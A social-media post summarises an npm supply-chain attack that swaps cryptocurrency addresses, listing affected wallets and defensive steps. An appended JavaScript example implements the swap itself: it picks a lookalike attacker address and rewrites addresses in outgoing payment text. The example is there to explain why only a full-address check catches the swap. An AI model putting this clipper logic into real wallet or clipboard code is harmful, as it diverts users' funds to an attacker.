Replying to Nic ⛄

https://www.youtube.com/watch?v=R0M2TL7RARw

nostr:npub1rxysxnjkhrmqd3ey73dp9n5y5yvyzcs64acc9g0k2epcpwwyya4spvhnp8

🚨 Summary

A major security incident is unfolding involving npm (Node Package Manager), widely used in Bitcoin and cryptocurrency wallet software. A developer’s npm account was compromised, allowing malicious code to spread through the ecosystem.

🔑 What Happened

- A supply chain attack injected malicious code into npm packages used by many wallets.

- The code can silently replace crypto addresses during transactions with attacker-controlled ones.

- It doesn’t just substitute a random address—it chooses one visually similar to the intended recipient, making detection harder.

- Risk applies across multiple cryptocurrencies, not just Bitcoin.

🛠️ Impacted Wallets & Apps

Hardware wallets with npm-dependent companion apps:

- Trezor (all models)

- Ledger (Nano S, X, Stax)

- BitBox02

- Blockstream Jade

- Keystone

- BitKey

Hot/software wallets using npm:

- Nunchuk

- Blockstream Green

- BlueWallet

- Muun Wallet

- Phoenix (only for on-chain, not Lightning)

- Zeus (on-chain)

- Exodus

- Tangem app

🧭 Recommended Actions

1) Do not panic. If not actively transacting, funds are likely safe.

2) Verify all addresses carefully (not just first/last characters—check the full string).

3) Use hardware devices with a screen to confirm addresses before signing.

4) Avoid using compromised companion apps. Switch to Sparrow, Specter, Electrum, or Wasabi where possible.

5) Avoid BitKey and Tangem for now since they lack screens and require their own npm-dependent apps.

6) Hold off on non-urgent on-chain transactions until more clarity/patches emerge.

7) Lightning payments (invoices) appear unaffected.

Well fuck

Discussion

No replies yet.
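The address swap the note describes (a lookalike address chosen for the intended recipient, and why checking only the first/last characters of an address does not catch it), as an added example that is not code from the video, the note, or any of the affected packages. The similarity metric (Levenshtein edit distance), the bech32 regex used to find addresses in outgoing text, and every address below are assumptions and constructed data for this illustration; the note does not say how the actual malware scores similarity, and none of the addresses is real or checksum-valid.

```javascript
// Added example, not code from the video or the original note.
// Models the address-swap behaviour the note describes: given the address a
// user is about to pay, pick the attacker-controlled address that looks most
// like it, then show why a first/last-characters check passes while a
// full-string comparison catches the swap.
// ASSUMPTIONS: Levenshtein edit distance as the similarity metric and the
// regex used to spot addresses are choices made for this example; the note
// does not say how the real malware scores similarity or finds addresses.
// Every address below is CONSTRUCTED (bech32 charset, not checksum-valid)
// and is not a real address.

// Classic Levenshtein edit distance (insert/delete/substitute, cost 1 each).
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Attacker side: choose the pool address closest to the intended one.
function pickLookalike(intended, pool) {
  let best = null;
  let bestDist = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(intended, candidate);
    if (d < bestDist) {
      bestDist = d;
      best = candidate;
    }
  }
  return best;
}

// Attacker side: clipper-style rewrite of every bech32 mainnet address found
// in outgoing text (a transaction payload, a pasted recipient field, ...).
const BECH32_ADDR = /\bbc1[qp][02-9ac-hj-np-z]{38,58}\b/g;
function clipAddresses(text, pool) {
  return text.replace(BECH32_ADDR, (addr) => pickLookalike(addr, pool));
}

// Defender side: the two checks the note contrasts.
function verifyPartial(shown, expected, n = 4) {
  // Compares only the first n and last n characters: defeated by lookalikes.
  return shown.slice(0, n) === expected.slice(0, n) &&
         shown.slice(-n) === expected.slice(-n);
}
function verifyFull(shown, expected) {
  // Compares the whole string, which is what the note recommends.
  return shown === expected;
}

// Constructed sample data (not real addresses).
const INTENDED = "bc1qy9x8gf2tvdw0pzrq2t9x8gfvdw0yz2rqp9xt8g";
const ATTACKER_POOL = [
  "bc1qe6mua7ls3jn54khc3jskh5n4ce6mua7l3jn5sk",
  "bc1qy9x8s3jn54khce6mua7ls3jn54khce6mp9xt8g", // shares first 8 / last 6 chars
  "bc1qkhce6mua7ls3jn54k6meac7hj3ln5s4kuh36ea",
];

// Walk one payment through the swap and both checks; returns the outcome.
function demo() {
  const payload = `{"to":"${INTENDED}","amount_sat":250000}`; // constructed
  const clipped = clipAddresses(payload, ATTACKER_POOL);
  const shown = JSON.parse(clipped).to;
  return {
    shown,
    partialCheckPasses: verifyPartial(shown, INTENDED, 4),
    fullCheckPasses: verifyFull(shown, INTENDED),
  };
}

console.log(demo());
```

Run with `node`: the swapped address shares `bc1qy9x8` and `p9xt8g` with the intended one, so the first/last-four check reports a match and only the full comparison fails. This is the point behind recommendation 2 above, and behind confirming the address on a hardware wallet screen rather than in the companion app that runs the npm code.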